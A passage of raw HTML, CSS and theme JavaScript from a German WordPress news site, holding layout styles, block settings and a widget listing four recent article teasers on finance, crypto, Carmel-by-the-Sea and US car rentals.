  768. <style>.tdi_85 .entry-thumb{background-position:center 50%}.tdi_85 .td-image-container{display:none}.tdi_85 .entry-thumb{background-image:none!important}body .tdi_85 .td-favorite{font-size:36px;box-shadow:1px 1px 4px 0px rgba(0,0,0,0.2)}.tdi_85 .td-module-meta-info{padding:0px;border-color:#eaeaea}.tdi_85 .td_module_wrap{width:25%;float:left;padding-left:20px;padding-right:20px;padding-bottom:0px;margin-bottom:0px}.rtl .tdi_85 .td_module_wrap{float:right}.tdi_85 .td_block_inner{margin-left:-20px;margin-right:-20px}.tdi_85 .td-module-container:before{bottom:-0px;border-color:#eaeaea}.tdi_85 .td-module-container{border-color:#eaeaea!important}.tdi_85 .td-post-vid-time{display:block}.tdi_85 .td-post-category{padding:0px;background-color:rgba(255,255,255,0);color:#f43f3f}.tdi_85 .td-post-category:not(.td-post-extra-category){display:none}.tdi_85 .td-author-photo .avatar{width:20px;height:20px;margin-right:6px;border-radius:50%}.tdi_85 .td-excerpt{display:none;margin:0px;column-count:1;column-gap:48px}.tdi_85 .td-audio-player{opacity:1;visibility:visible;height:auto;font-size:13px}.tdi_85 .td-read-more{display:none}.tdi_85 .td-author-date{display:inline}.tdi_85 .td-post-author-name{display:none}.tdi_85 .entry-review-stars{display:none}.tdi_85 .td-icon-star,.tdi_85 .td-icon-star-empty,.tdi_85 .td-icon-star-half{font-size:15px}.tdi_85 .td-module-comments{display:none}.tdi_85 .td_module_wrap:nth-child(4n+1){clear:both}.tdi_85 .td_module_wrap:nth-last-child(-n+4){margin-bottom:0;padding-bottom:0}.tdi_85 .td_module_wrap:nth-last-child(-n+4) .td-module-container:before{display:none}.tdi_85 .td-module-title a{color:#000000;box-shadow:inset 0 0 0 0 #000}.tdi_85 .td_module_wrap:hover .td-module-title a{color:#f43f3f!important}.tdi_85 .td-post-date,.tdi_85 .td-post-author-name span{color:#000000}.tdi_85.td_with_ajax_pagination .td-next-prev-wrap a,.tdi_85 .td-load-more-wrap a{color:#ffffff;background-color:#dddddd;border-width:0px;border-radius:100px}.tdi_85 .td-load-more-wrap a .td-load-more-icon-svg svg,.tdi_85 .td-load-more-wrap a .td-load-more-icon-svg svg *,.tdi_85.td_with_ajax_pagination .td-next-prev-wrap .td-next-prev-icon-svg svg,.tdi_85.td_with_ajax_pagination .td-next-prev-wrap .td-next-prev-icon-svg svg *{fill:#ffffff}.tdi_85.td_with_ajax_pagination .td-next-prev-wrap a:hover,.tdi_85 .td-load-more-wrap a:hover{color:#ffffff;background-color:#aaaaaa!important;border-color:#aaaaaa!important}.tdi_85 .td-load-more-wrap a:hover .td-load-more-icon-svg svg,.tdi_85 .td-load-more-wrap a:hover .td-load-more-icon-svg svg *,.tdi_85.td_with_ajax_pagination .td-next-prev-wrap a:hover .td-next-prev-icon-svg svg,.tdi_85.td_with_ajax_pagination .td-next-prev-wrap a:hover .td-next-prev-icon-svg svg *{fill:#ffffff}.tdi_85 .td-module-exclusive .td-module-title a:before{display:inline-block;margin:-4px 5px 0 0;padding:3px 5px;border-radius:2px;color:#ffffff;background-color:#ec3535;font-family:Work Sans!important;font-size:12px!important;line-height:1!important;font-weight:500!important;text-transform:uppercase!important;letter-spacing:-0.5px!important}.tdi_85 .td-module-exclusive:hover .td-module-title a:before{color:#ffffff;background-color:#ec3535}.tdi_85.td_with_ajax_pagination .td-next-prev-wrap,.tdi_85 .td-load-more-wrap{margin-top:0px}.tdi_85.td_with_ajax_pagination .td-next-prev-wrap a,.tdi_85 .td-load-more-wrap a i{font-size:21px}.tdi_85 .td-load-more-wrap a .td-load-more-icon-svg svg,.tdi_85.td_with_ajax_pagination .td-next-prev-wrap .td-next-prev-icon-svg svg{width:21px;height:calc(21px + 1px)}.tdi_85 .entry-title{font-family:PT Serif!important;font-size:14px!important;line-height:1.3!important;font-weight:600!important;letter-spacing:-0.5px!important}.tdi_85 .td-editor-date,.tdi_85 .td-editor-date .td-post-author-name a,.tdi_85 .td-editor-date .entry-date,.tdi_85 .td-module-comments a{font-family:Work Sans!important;font-size:12px!important;line-height:1!important;font-weight:400!important}html:not([class*='ie']) .tdi_85 .td-module-container:hover .entry-thumb:before{opacity:0}@media (min-width:768px){.tdi_85 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}@media (min-width:1019px) and (max-width:1140px){.tdi_85 .td-image-container{display:none}.tdi_85 .td_module_wrap{padding-left:10px;padding-right:10px;padding-bottom:0px;margin-bottom:0px;clear:none!important;padding-bottom:0px!important;margin-bottom:0px!important}.tdi_85 .td_block_inner{margin-left:-10px;margin-right:-10px}.tdi_85 .td-module-container:before{bottom:-0px}.tdi_85 .td_module_wrap:nth-child(4n+1){clear:both!important}.tdi_85 .td_module_wrap:nth-last-child(-n+4){margin-bottom:0!important;padding-bottom:0!important}.tdi_85 .td_module_wrap .td-module-container:before{display:block!important}.tdi_85 .td_module_wrap:nth-last-child(-n+4) .td-module-container:before{display:none!important}.tdi_85 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_85 .td-module-exclusive .td-module-title a:before{font-size:11px!important}.tdi_85 .td-editor-date,.tdi_85 .td-editor-date .td-post-author-name a,.tdi_85 .td-editor-date .entry-date,.tdi_85 .td-module-comments a{font-size:11px!important}@media (min-width:768px){.tdi_85 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}@media (min-width:768px) and (max-width:1018px){.tdi_85 .td-image-container{display:none}.tdi_85 .td_module_wrap{padding-left:5px;padding-right:5px;padding-bottom:0px;margin-bottom:0px;clear:none!important;padding-bottom:0px!important;margin-bottom:0px!important}.tdi_85 .td_block_inner{margin-left:-5px;margin-right:-5px}.tdi_85 .td-module-container:before{bottom:-0px}.tdi_85 .td-author-date{display:none}.tdi_85 .td-post-date,.tdi_85 .td-post-author-name span{display:none}.tdi_85 .td_module_wrap:nth-child(4n+1){clear:both!important}.tdi_85 .td_module_wrap:nth-last-child(-n+4){margin-bottom:0!important;padding-bottom:0!important}.tdi_85 .td_module_wrap .td-module-container:before{display:block!important}.tdi_85 .td_module_wrap:nth-last-child(-n+4) .td-module-container:before{display:none!important}.tdi_85 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_85 .td-module-exclusive .td-module-title a:before{font-size:11px!important}.tdi_85 .entry-title{margin:0px;font-size:13px!important}.tdi_85 .td-editor-date,.tdi_85 .td-editor-date .td-post-author-name a,.tdi_85 .td-editor-date .entry-date,.tdi_85 .td-module-comments a{font-size:10px!important}@media (min-width:768px){.tdi_85 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}@media (max-width:767px){.tdi_85 .td-image-wrap{padding-bottom:110%}.tdi_85 .td-image-container{flex:0 0 30%;width:30%;display:none}.ie10 .tdi_85 .td-image-container,.ie11 .tdi_85 .td-image-container{flex:0 0 auto}.tdi_85 .td_module_wrap{width:100%;float:left;padding-left:0px;padding-right:0px;padding-bottom:15px;margin-bottom:15px;padding-bottom:15px!important;margin-bottom:15px!important}.rtl .tdi_85 .td_module_wrap{float:right}.tdi_85 .td_block_inner{margin-left:-0px;margin-right:-0px}.tdi_85 .td-module-container:before{bottom:-15px}.tdi_85 .td_module_wrap:nth-last-child(1){margin-bottom:0!important;padding-bottom:0!important}.tdi_85 .td_module_wrap .td-module-container:before{display:block!important}.tdi_85 .td_module_wrap:nth-last-child(1) .td-module-container:before{display:none!important}.tdi_85 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_85 .td-module-exclusive .td-module-title a:before{font-size:11px!important}@media (min-width:768px){.tdi_85 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}</style><script type="rocketlazyloadscript">var block_tdi_85 = new tdBlock();
  769. block_tdi_85.id = "tdi_85";
  770. block_tdi_85.atts = '{"modules_on_row":"eyJhbGwiOiIyNSUiLCJwaG9uZSI6IjEwMCUifQ==","image_size":"","image_floated":"hidden","image_width":"eyJwaG9uZSI6IjMwIn0=","image_height":"eyJwaG9uZSI6IjExMCJ9","show_btn":"none","show_excerpt":"eyJwaG9uZSI6Im5vbmUiLCJhbGwiOiJub25lIn0=","show_com":"eyJwaG9uZSI6Im5vbmUiLCJhbGwiOiJub25lIn0=","show_author":"none","show_cat":"none","meta_padding":"0","f_title_font_size":"eyJhbGwiOiIxNCIsImxhbmRzY2FwZSI6IjE0IiwicG9ydHJhaXQiOiIxMyJ9","f_title_font_line_height":"1.3","f_title_font_weight":"600","all_modules_space":"eyJwaG9uZSI6IjMwIiwiYWxsIjoiMCJ9","category_id":"","show_date":"eyJwb3J0cmFpdCI6Im5vbmUifQ==","art_excerpt":"0","show_review":"none","tdc_css":"eyJhbGwiOnsibWFyZ2luLWJvdHRvbSI6IjAiLCJkaXNwbGF5IjoiIn0sInBvcnRyYWl0Ijp7ImRpc3BsYXkiOiIifSwicG9ydHJhaXRfbWF4X3dpZHRoIjoxMDE4LCJwb3J0cmFpdF9taW5fd2lkdGgiOjc2OCwicGhvbmUiOnsiZGlzcGxheSI6IiJ9LCJwaG9uZV9tYXhfd2lkdGgiOjc2N30=","f_title_font_family":"456","mc1_el":"10","title_txt_hover":"#f43f3f","title_txt":"#000000","f_meta_font_size":"eyJhbGwiOiIxMiIsInBvcnRyYWl0IjoiMTAiLCJsYW5kc2NhcGUiOiIxMSJ9","f_meta_font_line_height":"1","f_meta_font_weight":"400","f_meta_font_family":"653","limit":"4","modules_category":"","modules_category_padding":"0","cat_bg":"rgba(255,255,255,0)","cat_txt":"#f43f3f","f_title_font_transform":"","modules_gap":"eyJwb3J0cmFpdCI6IjEwIiwicGhvbmUiOiIwIiwibGFuZHNjYXBlIjoiMjAifQ==","sort":"","el_class":"td-week-slider","ajax_pagination":"next_prev","td_ajax_preloading":"preload","pag_space":"0","pag_border_width":"0","prev_tdicon":"tdc-font-tdmp tdc-font-tdmp-arrow-left","next_tdicon":"tdc-font-tdmp tdc-font-tdmp-arrow-right","pag_icons_size":"21","pag_text":"#ffffff","pag_h_text":"#ffffff","pag_bg":"#dddddd","pag_h_bg":"#aaaaaa","pag_border_radius":"100","time_ago":"yes","show_modified_date":"yes","date_txt":"#000000","f_title_font_spacing":"-0.5","art_title":"eyJwb3J0cmFpdCI6IjAifQ==","excl_padd":"3px 5px","excl_margin":"-4px 5px 0 0","excl_color":"#ffffff","excl_color_h":"#ffffff","excl_bg":"#ec3535","excl_bg_h":"#ec3535","f_excl_font_family":"653","f_excl_font_transform":"uppercase","f_excl_font_size":"eyJhbGwiOiIxMiIsImxhbmRzY2FwZSI6IjExIiwicG9ydHJhaXQiOiIxMSIsInBob25lIjoiMTEifQ==","f_excl_font_weight":"500","f_excl_font_line_height":"1","f_excl_font_spacing":"-0.5","excl_radius":"2","excl_show":"","block_type":"td_flex_block_1","separator":"","custom_title":"","custom_url":"","block_template_id":"","title_tag":"","mc1_tl":"","mc1_title_tag":"","post_ids":"","taxonomies":"","category_ids":"","in_all_terms":"","tag_slug":"","autors_id":"","installed_post_types":"","include_cf_posts":"","exclude_cf_posts":"","linked_posts":"","favourite_only":"","locked_only":"","offset":"","open_in_new_window":"","time_ago_add_txt":"ago","time_ago_txt_pos":"","review_source":"","td_query_cache":"","td_query_cache_expiration":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","container_width":"","m_padding":"","modules_border_size":"","modules_border_style":"","modules_border_color":"#eaeaea","modules_border_radius":"","modules_divider":"","modules_divider_color":"#eaeaea","h_effect":"","image_alignment":"50","image_radius":"","hide_image":"","show_favourites":"","fav_size":"2","fav_space":"","fav_ico_color":"","fav_ico_color_h":"","fav_bg":"","fav_bg_h":"","fav_shadow_shadow_header":"","fav_shadow_shadow_title":"Shadow","fav_shadow_shadow_size":"","fav_shadow_shadow_offset_horizontal":"","fav_shadow_shadow_offset_vertical":"","fav_shadow_shadow_spread":"","fav_shadow_shadow_color":"","video_icon":"","video_popup":"yes","video_rec":"","spot_header":"","video_rec_title":"","video_rec_color":"","video_rec_disable":"","autoplay_vid":"yes","show_vid_t":"block","vid_t_margin":"","vid_t_padding":"","video_title_color":"","video_title_color_h":"","video_bg":"","video_overlay":"","vid_t_color":"","vid_t_bg_color":"","f_vid_title_font_header":"","f_vid_title_font_title":"Video pop-up article title","f_vid_title_font_settings":"","f_vid_title_font_family":"","f_vid_title_font_size":"","f_vid_title_font_line_height":"","f_vid_title_font_style":"","f_vid_title_font_weight":"","f_vid_title_font_transform":"","f_vid_title_font_spacing":"","f_vid_title_":"","f_vid_time_font_title":"Video duration text","f_vid_time_font_settings":"","f_vid_time_font_family":"","f_vid_time_font_size":"","f_vid_time_font_line_height":"","f_vid_time_font_style":"","f_vid_time_font_weight":"","f_vid_time_font_transform":"","f_vid_time_font_spacing":"","f_vid_time_":"","excl_txt":"","all_excl_border":"","all_excl_border_style":"solid","all_excl_border_color":"","excl_border_color_h":"","f_excl_font_header":"","f_excl_font_title":"Label text","f_excl_font_settings":"","f_excl_font_style":"","f_excl_":"","meta_info_align":"","meta_info_horiz":"layout-default","meta_width":"","meta_margin":"","meta_space":"","art_btn":"","meta_info_border_size":"","meta_info_border_style":"","meta_info_border_color":"#eaeaea","meta_info_border_radius":"","modules_category_margin":"","modules_cat_border":"","modules_category_radius":"0","modules_extra_cat":"","author_photo":"","author_photo_size":"","author_photo_space":"","author_photo_radius":"","review_space":"","review_size":"2.5","review_distance":"","excerpt_col":"1","excerpt_gap":"","excerpt_middle":"","excerpt_inline":"","show_audio":"block","hide_audio":"","art_audio":"","art_audio_size":"1.5","btn_title":"","btn_margin":"","btn_padding":"","btn_border_width":"","btn_radius":"","pag_padding":"","f_header_font_header":"","f_header_font_title":"Block header","f_header_font_settings":"","f_header_font_family":"","f_header_font_size":"","f_header_font_line_height":"","f_header_font_style":"","f_header_font_weight":"","f_header_font_transform":"","f_header_font_spacing":"","f_header_":"","f_ajax_font_title":"Ajax categories","f_ajax_font_settings":"","f_ajax_font_family":"","f_ajax_font_size":"","f_ajax_font_line_height":"","f_ajax_font_style":"","f_ajax_font_weight":"","f_ajax_font_transform":"","f_ajax_font_spacing":"","f_ajax_":"","f_more_font_title":"Load more button","f_more_font_settings":"","f_more_font_family":"","f_more_font_size":"","f_more_font_line_height":"","f_more_font_style":"","f_more_font_weight":"","f_more_font_transform":"","f_more_font_spacing":"","f_more_":"","f_title_font_header":"","f_title_font_title":"Article title","f_title_font_settings":"","f_title_font_style":"","f_title_":"","f_cat_font_title":"Article category tag","f_cat_font_settings":"","f_cat_font_family":"","f_cat_font_size":"","f_cat_font_line_height":"","f_cat_font_style":"","f_cat_font_weight":"","f_cat_font_transform":"","f_cat_font_spacing":"","f_cat_":"","f_meta_font_title":"Article meta info","f_meta_font_settings":"","f_meta_font_style":"","f_meta_font_transform":"","f_meta_font_spacing":"","f_meta_":"","f_ex_font_title":"Article excerpt","f_ex_font_settings":"","f_ex_font_family":"","f_ex_font_size":"","f_ex_font_line_height":"","f_ex_font_style":"","f_ex_font_weight":"","f_ex_font_transform":"","f_ex_font_spacing":"","f_ex_":"","f_btn_font_title":"Article read more button","f_btn_font_settings":"","f_btn_font_family":"","f_btn_font_size":"","f_btn_font_line_height":"","f_btn_font_style":"","f_btn_font_weight":"","f_btn_font_transform":"","f_btn_font_spacing":"","f_btn_":"","mix_color":"","mix_type":"","fe_brightness":"1","fe_contrast":"1","fe_saturate":"1","mix_color_h":"","mix_type_h":"","fe_brightness_h":"1","fe_contrast_h":"1","fe_saturate_h":"1","m_bg":"","color_overlay":"","shadow_shadow_header":"","shadow_shadow_title":"Module Shadow","shadow_shadow_size":"","shadow_shadow_offset_horizontal":"","shadow_shadow_offset_vertical":"","shadow_shadow_spread":"","shadow_shadow_color":"","all_underline_height":"","all_underline_color":"","cat_bg_hover":"","cat_txt_hover":"","cat_border":"","cat_border_hover":"","meta_bg":"","author_txt":"","author_txt_hover":"","ex_txt":"","com_bg":"","com_txt":"","rev_txt":"","audio_btn_color":"","audio_time_color":"","audio_bar_color":"","audio_bar_curr_color":"","shadow_m_shadow_header":"","shadow_m_shadow_title":"Meta info shadow","shadow_m_shadow_size":"","shadow_m_shadow_offset_horizontal":"","shadow_m_shadow_offset_vertical":"","shadow_m_shadow_spread":"","shadow_m_shadow_color":"","btn_bg":"","btn_bg_hover":"","btn_txt":"","btn_txt_hover":"","btn_border":"","btn_border_hover":"","pag_border":"","pag_h_border":"","ajax_pagination_next_prev_swipe":"","ajax_pagination_infinite_stop":"","css":"","td_column_number":3,"header_color":"","color_preset":"","border_top":"","class":"tdi_85","tdc_css_class":"tdi_85","tdc_css_class_style":"tdi_85_rand_style"}';
  771. block_tdi_85.td_column_number = "3";
  772. block_tdi_85.block_type = "td_flex_block_1";
  773. block_tdi_85.post_count = "4";
  774. block_tdi_85.found_posts = "3784";
  775. block_tdi_85.header_color = "";
  776. block_tdi_85.ajax_pagination_infinite_stop = "";
  777. block_tdi_85.max_num_pages = "946";
  778. tdBlocksArray.push(block_tdi_85);
  779. </script><div class="td-block-title-wrap"></div><div id=tdi_85 class="td_block_inner td-mc1-wrap">
  780.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  781.            <div class="td-module-container td-category-pos-">
  782.                                    <div class="td-image-container">
  783.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/finanzeno-net/" rel="bookmark" class="td-image-wrap " title="Finanzeno.net Schafft Erstklassige Online-Finanzplattformen"><span data-bg="https://nachrichtenmorgen.de/wp-content/uploads/2024/05/Finanzeno.net-Schafft-Erstklassige-Online-Finanzplattformen-696x392.jpg" class="entry-thumb td-thumb-css rocket-lazyload" style="" ></span></a></div>                                                                    </div>
  784.                
  785.                <div class="td-module-meta-info">
  786.                                        
  787.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/finanzeno-net/" rel="bookmark" title="Finanzeno.net Schafft Erstklassige Online-Finanzplattformen">Finanzeno.net Schafft Erstklassige Online-Finanzplattformen</a></h3>
  788.                    
  789.                                            <div class="td-editor-date">
  790.                                                        
  791.                                                            <span class="td-author-date">
  792.                                                                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-05-06T17:15:57+02:00" >1 Tag ago</time></span>                                                                        <span class="td-module-comments"><a href="https://nachrichtenmorgen.de/finanzeno-net/#respond">0</a></span>                                </span>
  793.                                                    </div>
  794.                    
  795.                    <div class="td-excerpt">Finanzeno.net, ein führender Name im Finanzdienstleistungssektor, setzt weiterhin hohe...</div>
  796.                    
  797.                                    </div>
  798.            </div>
  799.        </div>
  800.  
  801.        
  802.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  803.            <div class="td-module-container td-category-pos-">
  804.                                    <div class="td-image-container">
  805.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/die-letzten-jahre-waren-fuer-krypto-investoren/" rel="bookmark" class="td-image-wrap " title="Die letzten Jahre waren für Krypto-Investoren und Krypto-Börsenbesitzer ein wilder Ritt."><span data-bg="https://nachrichtenmorgen.de/wp-content/uploads/2024/05/Die-letzten-Jahre-waren-fuer-Krypto-Investoren-und-Krypto-Boersenbesitzer-ein-wilder-Ritt.jpg" class="entry-thumb td-thumb-css rocket-lazyload" style="" ></span></a></div>                                                                    </div>
  806.                
  807.                <div class="td-module-meta-info">
  808.                                        
  809.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/die-letzten-jahre-waren-fuer-krypto-investoren/" rel="bookmark" title="Die letzten Jahre waren für Krypto-Investoren und Krypto-Börsenbesitzer ein wilder Ritt.">Die letzten Jahre waren für Krypto-Investoren und Krypto-Börsenbesitzer ein wilder Ritt.</a></h3>
  810.                    
  811.                                            <div class="td-editor-date">
  812.                                                        
  813.                                                            <span class="td-author-date">
  814.                                                                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-05-04T15:49:51+02:00" >3 Tagen ago</time></span>                                                                        <span class="td-module-comments"><a href="https://nachrichtenmorgen.de/die-letzten-jahre-waren-fuer-krypto-investoren/#respond">0</a></span>                                </span>
  815.                                                    </div>
  816.                    
  817.                    <div class="td-excerpt">5 Krypto-Trends, denen man im Jahr 2024 und darüber...</div>
  818.                    
  819.                                    </div>
  820.            </div>
  821.        </div>
  822.  
  823.        
  824.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  825.            <div class="td-module-container td-category-pos-">
  826.                                    <div class="td-image-container">
  827.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/carmel-by-the-sea/" rel="bookmark" class="td-image-wrap " title="Carmel-by-the-Sea: Ein idyllisches Paradies an der kalifornischen Küste"><span data-bg="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Entdeckung-der-versunkenen-Schaetze-mit-dem-10-696x391.jpg" class="entry-thumb td-thumb-css rocket-lazyload" style="" ></span></a></div>                                                                    </div>
  828.                
  829.                <div class="td-module-meta-info">
  830.                                        
  831.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/carmel-by-the-sea/" rel="bookmark" title="Carmel-by-the-Sea: Ein idyllisches Paradies an der kalifornischen Küste">Carmel-by-the-Sea: Ein idyllisches Paradies an der kalifornischen Küste</a></h3>
  832.                    
  833.                                            <div class="td-editor-date">
  834.                                                        
  835.                                                            <span class="td-author-date">
  836.                                                                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-05-02T07:53:04+02:00" >5 Tagen ago</time></span>                                                                        <span class="td-module-comments"><a href="https://nachrichtenmorgen.de/carmel-by-the-sea/#respond">0</a></span>                                </span>
  837.                                                    </div>
  838.                    
  839.                    <div class="td-excerpt">Carmel-by-the-Sea, oft einfach als Carmel bekannt, ist ein malerisches...</div>
  840.                    
  841.                                    </div>
  842.            </div>
  843.        </div>
  844.  
  845.        
  846.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  847.            <div class="td-module-container td-category-pos-">
  848.                                    <div class="td-image-container">
  849.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/mietwagen-in-den-usa/" rel="bookmark" class="td-image-wrap " title="Mietwagen in den USA: Ein umfassender Ratgeber für Ihre Buchung"><span data-bg="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Entdeckung-der-versunkenen-Schaetze-mit-dem-1-1-696x391.jpg" class="entry-thumb td-thumb-css rocket-lazyload" style="" ></span></a></div>                                                                    </div>
  850.                
  851.                <div class="td-module-meta-info">
  852.                                        
  853.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/mietwagen-in-den-usa/" rel="bookmark" title="Mietwagen in den USA: Ein umfassender Ratgeber für Ihre Buchung">Mietwagen in den USA: Ein umfassender Ratgeber für Ihre Buchung</a></h3>
  854.                    
  855.                                            <div class="td-editor-date">
  856.                                                        
  857.                                                            <span class="td-author-date">
  858.                                                                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-05-02T07:52:46+02:00" >5 Tagen ago</time></span>                                                                        <span class="td-module-comments"><a href="https://nachrichtenmorgen.de/mietwagen-in-den-usa/#respond">0</a></span>                                </span>
  859.                                                    </div>
  860.                    
  861.                    <div class="td-excerpt">Ein Roadtrip durch die USA mit dem Mietwagen –...</div>
  862.                    
  863.                                    </div>
  864.            </div>
  865.        </div>
  866.  
  867.        </div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" aria-label="prev-page" id="prev-page-tdi_85" data-td_block_id="tdi_85"><i class="td-next-prev-icon tdc-font-tdmp tdc-font-tdmp-arrow-left"></i></a><a href="#"  class="td-ajax-next-page" aria-label="next-page" id="next-page-tdi_85" data-td_block_id="tdi_85"><i class="td-next-prev-icon tdc-font-tdmp tdc-font-tdmp-arrow-right"></i></a></div></div></div></div></div></div><div id="tdi_86" class="tdc-row stretch_row_1400 td-stretch-content"><div class="vc_row tdi_87  wpb_row td-pb-row" >
  868. <style scoped>.tdi_87,.tdi_87 .tdc-columns{min-height:0}.tdi_87,.tdi_87 .tdc-columns{display:block}.tdi_87 .tdc-columns{width:100%}@media (min-width:768px){.tdi_87{margin-left:-10px;margin-right:-10px}.tdi_87 .tdc-row-video-background-error,.tdi_87>.vc_column,.tdi_87>.tdc-columns>.vc_column{padding-left:10px;padding-right:10px}}@media (min-width:1019px) and (max-width:1140px){@media (min-width:768px){.tdi_87{margin-left:-5px;margin-right:-5px}.tdi_87 .tdc-row-video-background-error,.tdi_87>.vc_column,.tdi_87>.tdc-columns>.vc_column{padding-left:5px;padding-right:5px}}}@media (min-width:768px) and (max-width:1018px){@media (min-width:768px){.tdi_87{margin-left:-5px;margin-right:-5px}.tdi_87 .tdc-row-video-background-error,.tdi_87>.vc_column,.tdi_87>.tdc-columns>.vc_column{padding-left:5px;padding-right:5px}}}@media (max-width:767px){@media (min-width:768px){.tdi_87{margin-left:-0px;margin-right:-0px}.tdi_87 .tdc-row-video-background-error,.tdi_87>.vc_column,.tdi_87>.tdc-columns>.vc_column{padding-left:0px;padding-right:0px}}}.tdi_87{margin-top:-90px!important;margin-bottom:40px!important}.tdi_87 .td_block_wrap{text-align:left}@media (max-width:767px){.tdi_87{margin-top:0px!important;margin-bottom:60px!important;padding-top:40px!important}}@media (min-width:1019px) and (max-width:1140px){.tdi_87{margin-top:-80px!important;margin-bottom:30px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_87{margin-top:-75px!important;margin-bottom:30px!important;padding-right:5px!important;padding-left:5px!important}}</style><div class="vc_column tdi_89  wpb_column vc_column_container tdc-column td-pb-span3">
  869. <style scoped>.tdi_89{vertical-align:baseline}.tdi_89>.wpb_wrapper,.tdi_89>.wpb_wrapper>.tdc-elements{display:block}.tdi_89>.wpb_wrapper>.tdc-elements{width:100%}.tdi_89>.wpb_wrapper>.vc_row_inner{width:auto}.tdi_89>.wpb_wrapper{width:auto;height:auto}.tdi_89{margin-top:-10px!important;width:20%!important}@media (min-width:1019px) and (max-width:1140px){.tdi_89{margin-top:-2px!important}}@media (max-width:767px){.tdi_89{margin-bottom:40px!important;width:100%!important}}</style><div class="wpb_wrapper" ><div class="tdm_block td_block_wrap tdm_block_column_title tdi_90 tdm-content-horiz-left td-pb-border-top td_block_template_1"  data-td-block-uid="tdi_90" ><div class="td-block-row"><div class="td-block-span12 tdm-col">
  870. <style>body .tdi_91 .tdm-title{color:#000000}.tdi_91 .tdm-title{font-family:Work Sans!important;font-size:32px!important;line-height:1!important;font-weight:700!important;letter-spacing:-1px!important}@media (min-width:1019px) and (max-width:1140px){.tdi_91 .tdm-title{font-size:26px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_91 .tdm-title{font-size:20px!important}}</style><div class="tds-title tds-title1 td-fix-index tdi_91 "><h3 class="tdm-title tdm-title-sm">Frische Geschichten
  871. </h3></div></div></div></div><div class="tdm_block td_block_wrap tdm_block_column_title tdi_92 tdm-content-horiz-left td-pb-border-top td_block_template_1"  data-td-block-uid="tdi_92" >
  872. <style>.tdi_92{margin-top:-12px!important;width:90%!important}@media (min-width:1019px) and (max-width:1140px){.tdi_92{margin-top:-14px!important;width:100%!important}}@media (min-width:768px) and (max-width:1018px){.tdi_92{margin-top:-16px!important;width:100%!important;display:none!important}}@media (max-width:767px){.tdi_92{width:70%!important}}</style><div class="td-block-row"><div class="td-block-span12 tdm-col">
  873. <style>body .tdi_93 .tdm-title{color:#000000}.tdi_93 .tdm-title{font-family:Work Sans!important;font-size:13px!important;line-height:1.2!important;font-weight:600!important;text-transform:uppercase!important}@media (min-width:1019px) and (max-width:1140px){.tdi_93 .tdm-title{font-size:12px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_93 .tdm-title{font-size:11px!important}}</style><div class="tds-title tds-title1 td-fix-index tdi_93 "><h3 class="tdm-title tdm-title-sm">Heute: Stöbern Sie in den handverlesenen Artikeln unserer Redaktion!
  874. </h3></div></div></div></div><div class="td_block_wrap td_flex_block_1 tdi_94 td_with_ajax_pagination td-pb-border-top td_block_template_1 td_flex_block"  data-td-block-uid="tdi_94" >
  875. <style>.tdi_94{margin-top:20px!important;margin-bottom:0px!important}@media (min-width:768px) and (max-width:1018px){.tdi_94{margin-top:-5px!important}}@media (min-width:1019px) and (max-width:1140px){.tdi_94{margin-top:5px!important}}</style>
  876. <style>.tdi_94 .entry-thumb{background-position:center 50%}.tdi_94 .td-image-container{display:none}.tdi_94 .entry-thumb{background-image:none!important}body .tdi_94 .td-favorite{font-size:36px;box-shadow:1px 1px 4px 0px rgba(0,0,0,0.2)}.tdi_94 .td-module-meta-info{padding:0px;border-color:#eaeaea}.tdi_94 .td_module_wrap{padding-left:0px;padding-right:0px;padding-bottom:6px;margin-bottom:6px}.tdi_94 .td_block_inner{margin-left:-0px;margin-right:-0px}.tdi_94 .td-module-container:before{bottom:-6px;border-color:#eaeaea}.tdi_94 .td-module-container{padding:0 0 15px;border-width:0 0 1px 0;border-style:solid;border-color:#000;border-color:#eaeaea!important}.tdi_94 .td-post-vid-time{display:block}.tdi_94 .td-post-category{margin:0 5px 0 0;padding:2px 0;background-color:rgba(255,255,255,0);color:#ec3535;border-width:0px;border-style:solid;border-color:#aaa;font-family:Work Sans!important;font-size:12px!important;line-height:1!important;font-weight:600!important;text-transform:uppercase!important;letter-spacing:-0.5px!important}.tdi_94 .td-author-photo .avatar{width:20px;height:20px;margin-right:6px;border-radius:50%}.tdi_94 .td-excerpt{display:none;margin:0px;column-count:1;column-gap:48px}.tdi_94 .td-audio-player{opacity:1;visibility:visible;height:auto;font-size:13px}.tdi_94 .td-read-more{display:none}.tdi_94 .td-author-date{display:inline}.tdi_94 .td-post-author-name{display:none}.tdi_94 .entry-review-stars{display:none}.tdi_94 